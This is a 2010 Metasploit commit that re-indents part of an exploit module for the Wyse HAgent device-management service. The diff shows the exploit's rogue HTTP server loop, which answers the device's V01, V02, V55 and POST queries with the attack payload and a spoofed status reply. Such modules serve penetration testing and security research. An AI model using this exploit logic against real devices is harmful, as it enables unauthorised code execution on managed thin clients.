oops it wasnt broken after all!

git-svn-id: file:///home/svn/framework3/trunk@9178 4d416f70-5f16-0410-b530-b9f4589650da
2010-04-30 06:38:48 +00:00 · 2010-04-30 06:38:48 +00:00 · 54725099d5
parent 22529ae81b
commit 54725099d5
1 changed files with 29 additions and 28 deletions
--- a/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb
+++ b/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb
@ -155,37 +155,38 @@ class Metasploit3 < Msf::Exploit::Remote
 		print_status("Waiting on a connection to the HTTP service")
 		begin
 			Timeout.timeout(190) do
-			done = false
-			while (not done and session = wdmserver.accept)
-				req = session.recvfrom(2000)[0]
-				next if not req
-				next if req.empty?
-				print_status("HTTP Request: #{req.split("\n")[0].strip}")
+				done = false
+				while (not done and session = wdmserver.accept)
+					req = session.recvfrom(2000)[0]
+					next if not req
+					next if req.empty?
+					print_status("HTTP Request: #{req.split("\n")[0].strip}")

-				case req
-				when /V01/
-					print_status("++ connected (#{session.peerhost}), " + "sending payload (#{pwn.size} bytes)")
-					res = pwn
-				when /V02/
-					print_status("++ device sending V02 query...")
-					res  = "&00|Existing Client With No Pending Updates|&IT=10|&CID=7|QUB=3|QUT=120|CU=1|"
-					done = true
+					case req
+					when /V01/
+						print_status("++ connected (#{session.peerhost}), " + "sending payload (#{pwn.size} bytes)")
+						res = pwn
+					when /V02/
+						print_status("++ device sending V02 query...")
+						res  = "&00|Existing Client With No Pending Updates|&IT=10|&CID=7|QUB=3|QUT=120|CU=1|"
+						done = true

-				when /V55/
-		  	 		print_status("++ device sending V55 query...")
-					res = pwn
-				when /POST/  # PUT is used for non encrypted requests.
-		  	 		print_status("++ device sending V55 query...")
-					res = pwn
-					done = true
-				else
-					print_status("+++ sending generic response...")
-					res = pwn
+					when /V55/
+						print_status("++ device sending V55 query...")
+						res = pwn
+					when /POST/  # PUT is used for non encrypted requests.
+						print_status("++ device sending V55 query...")
+						res = pwn
+						done = true
+					else
+						print_status("+++ sending generic response...")
+						res = pwn
+					end
+
+					print_status("Sending reply: #{res}")
+					session.put(res)
+					session.close
 				end
-
-				print_status("Sending reply: #{res}")
-				session.put(res)
-				session.close
 			end
 		rescue ::Timeout::Error
 			print_status("Timed out waiting on the HTTP request")